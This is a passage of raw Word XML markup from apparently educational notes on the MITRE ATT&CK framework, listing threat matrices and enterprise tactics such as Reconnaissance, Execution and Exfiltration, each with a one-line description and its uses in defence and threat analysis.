              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="4501516C">
              <w:rPr/>
              <w:t>8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4FB50F27" w14:textId="60BBF43A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Container/Kubernetes Matrix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340E517E" w14:textId="0C6907B2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Containers, Docker, Kubernetes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496F726E" w14:textId="21402E13">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="5BD50B3F" w14:textId="7D825801">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Container-specific threats like API abuse, poisoned images, and container escapes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="0F71355E">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="58618624" w:rsidP="3E79F1B8" w:rsidRDefault="58618624" w14:paraId="3D4C14AC" w14:textId="55BD26BA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="58618624">
              <w:rPr/>
              <w:t>9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52DDE6C8" w14:textId="01318467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DevOps Threat Matrix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32A1D19D" w14:textId="1B426B26">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>CI/CD Pipelines, GitHub, Azure DevOps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14920A45" w14:textId="5583EC91">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="0FC6F52F" w14:textId="2F202F98">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>DevOps-specific attack paths such as poisoned builds and leaked secrets in pipelines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="430A634F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C710F14" w:rsidP="3E79F1B8" w:rsidRDefault="2C710F14" w14:paraId="2143E06B" w14:textId="30F7BCA7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C710F14">
              <w:rPr/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="538238DF" w14:textId="5FE87567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Cloud Storage Threat Matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2814" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="5A598CC4" w14:textId="4862AC23">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>S3, Azure Blob, GCP Buckets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3822" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="37ABDF5E" w14:textId="3BC1D187">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Threats involving object storage misuse, including public exposure and data exfiltration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4E129A32" w14:textId="604EDBB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584D3E" w:rsidP="3E79F1B8" w:rsidRDefault="37584D3E" w14:paraId="13EDA711" w14:textId="4D03EFC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="21EFA9C9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Why)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37584D3E" w:rsidRDefault="37584D3E" w14:paraId="3FAFBE7D" w14:textId="2FB1E4D2">
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strategic objectives</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an attacker. Each tactic represents a </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phase</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="37584D3E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the attack lifecycle, such as gaining access, running code, stealing credentials, or moving laterally through a network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2551B753" w:rsidP="3E79F1B8" w:rsidRDefault="2551B753" w14:paraId="7C9B3D51" w14:textId="3AAF23C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="2551B753">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:hyperlink r:id="Re01178d5785d41e9">
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="4951CA29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MITRE ATT&amp;CK</w:t>
        </w:r>
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="4951CA29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u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="3E79F1B8" w:rsidR="581689BC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u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3019D482" w:rsidP="3E79F1B8" w:rsidRDefault="3019D482" w14:paraId="6AF40920" w14:textId="0D48842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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="3019D482">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3019D482" w:rsidP="3E79F1B8" w:rsidRDefault="3019D482" w14:paraId="23057797" w14:textId="7593C2B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E79F1B8" w:rsidR="3019D482">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3019D482" w:rsidP="3E79F1B8" w:rsidRDefault="3019D482" w14:paraId="7348227A" w14:textId="6524064C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3E79F1B8" w:rsidR="3019D482">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28565AF4" w:rsidP="3E79F1B8" w:rsidRDefault="28565AF4" w14:paraId="1B310772" w14:textId="7B75C69F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="28565AF4">
        <w:rPr/>
        <w:t xml:space="preserve">1.Enterprise </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="28565AF4">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tacktics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FF30ED0" w:rsidRDefault="1FF30ED0" w14:paraId="22DC9DE7" w14:textId="7F6D68E8">
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30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Enterprise Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30E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 </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30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high-level strategic goals or objectives</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30E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an adversary (attacker) tries to achieve during different phases of a cyberattack against enterprise systems. Each tactic represents a </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30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stage in the attack lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30E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showing </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30E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</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1FF30E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certain behavior or action is performed by the attacker—not how it is done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="546851BB" w14:textId="3AA33AB2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0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DFDFDF" w:sz="6"/>
          <w:left w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:bottom w:val="single" w:color="DFDFDF" w:sz="6"/>
          <w:right w:val="single" w:color="DFDFDF" w:sz="6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1950"/>
        <w:gridCol w:w="6270"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="56EF3EEE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26AF5D69" w14:textId="6CE3ED14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3170C5C5" w14:textId="79F2E1B4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36928694" w14:textId="207F6205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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="075920E8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A623F2E" w14:textId="50E25DF9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R2ff9e1f1509041ed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TA0043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A777073" w14:textId="0EE22554">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ra188a938da724520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Reconnaissance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990BE45" w14:textId="3EA97C77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gather information they can use to plan future operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4716712D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3E0E499" w14:textId="33D2BC1C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R25e5bf2d3ce540d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TA0042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33F6238" w14:textId="36D2413A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R1318f63a61dc48f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Resource Development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BA1D8CD" w14:textId="4CF76860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establish resources they can use to support operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="29FE22D4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3688BC8" w14:textId="49959259">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R67ccd4a568294b2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TA0001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CA50AC0" w14:textId="7045E577">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R5933952e22f3477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Initial Access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C78BDBB" w14:textId="149E9EEB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get into your network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="66B3D410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B36B367" w14:textId="1BC7B0F6">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R6e44c85637744d3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TA0002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3032CB4" w14:textId="796BEF54">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ra34d81e21d7248f6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Execution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5A50987" w14:textId="07DC93B9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run malicious code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="7DC55765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F60CC00" w14:textId="368F821A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rec51ad66267c402b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TA0003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8C93B01" w14:textId="03781EFF">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R97a8858d71f84beb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Persistence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F67C007" w14:textId="5D2B719F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maintain their foothold.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="7349A6D0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63FB8C6" w14:textId="0F0DCB25">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R29355dd3675a4c5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TA0004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F0896A1" w14:textId="142A91EC">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rc560e73e92194165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Privilege Escalation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419D337" w14:textId="1F3522C8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gain higher-level permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="609737DC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99C5E24" w14:textId="10C73A12">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R31134b688df347d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TA0005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2948B80" w14:textId="390D8AB8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Ra3d7a70229d34728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Defense Evasion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B0BD872" w14:textId="0A095EE4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avoid being detected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="6E8E69FA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C9585A7" w14:textId="5B835B71">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R4d66cb383c3e46f8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TA0006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C00836D" w14:textId="5FEEAD21">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R7a239e12abd94c80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Credential Access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5D26980" w14:textId="3564FC27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steal account names and passwords.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="236B885B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8B520C3" w14:textId="3FDB42CD">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R7c0a535da2e5441e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TA0007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C4DA23D" w14:textId="1F9AE526">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R7b7e5c8eeb4849b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Discovery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B964AB5" w14:textId="2E255737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figure out your environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="1FAA40A5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CB0FAEE" w14:textId="1D367969">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rf5a81f69ca784136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TA0008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E5587F8" w14:textId="352911BA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R66cb5f42ae724c34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Lateral Movement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3F27FD0" w14:textId="1247BDD8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move through your environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="1F94CE47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1975989" w14:textId="4F723D44">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R2a0a05d769a245b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TA0009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79706CC" w14:textId="68669ED2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R5db89ee28c08487d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Collection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7173531" w14:textId="141A9ED3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gather data of interest to their goal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="5B6836B6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0D3CB87" w14:textId="76606B5A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R0716e3dc05a04fe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TA0011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7E6DC06" w14:textId="06FD734B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R40d786154121434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Command and Control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2D81CA1" w14:textId="2B58D7B2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communicate with compromised systems to control them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="3C3BBAF2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A331F75" w14:textId="71FD2376">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R8575baa134a949f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TA0010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1F24F03" w14:textId="7A76E095">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="R03c78732cac04ff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Exfiltration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72C2C2B" w14:textId="5653C592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steal data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="1465A8E7">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="114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0023F64" w14:textId="2E9A6D2B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rfe745be3cc674e3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TA0040</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="195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C3A5180" w14:textId="152A2C3B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="Rd38c11898438494d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Impact</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="627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2481856" w14:textId="102C9543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manipulate, interrupt, or destroy your systems and data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="686AE05F" w:rsidP="3E79F1B8" w:rsidRDefault="686AE05F" w14:paraId="1777AE5B" w14:textId="7EE17923">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="686AE05F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Role of Enterprise Tactics in Cybersecurity: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845"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="08737B30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3FD4B75F" w14:textId="73FC3A84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Role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5B1C0C3F" w14:textId="010292F2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Importance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="0D69C067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49B60B08" w14:textId="013FEC73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Framework Design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1B53D82D" w14:textId="35301D1B">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Tactics organize the full matrix of techniques in MITRE ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="72F895EF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495CF6B7" w14:textId="0E82C15A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Threat Analysis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34E1E517" w14:textId="5F39E491">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve">Helps analysts understand an attacker’s </w:t>
            </w:r>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>intent</w:t>
            </w:r>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve"> at each stage of an intrusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="651CA735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6C8F0A38" w14:textId="5DBD0369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3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Blue Teaming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76D10755" w14:textId="69558176">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve">Enables defenders to </w:t>
            </w:r>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>map security controls and alerts</w:t>
            </w:r>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve"> to specific tactics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="6CF9E0F6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2A5DA6A7" w14:textId="0197ED81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3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Red Teaming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4CA191AE" w14:textId="501D8585">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Helps ethical hackers simulate realistic attack behaviors based on attacker goals.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="13CB0135">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="63F68B49" w14:textId="45575446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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Threat Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7845" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6A1098DD" w14:textId="123E6688">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Used to classify and share adversary behaviors using a common language.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="4EF2007F" w14:textId="674429A8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
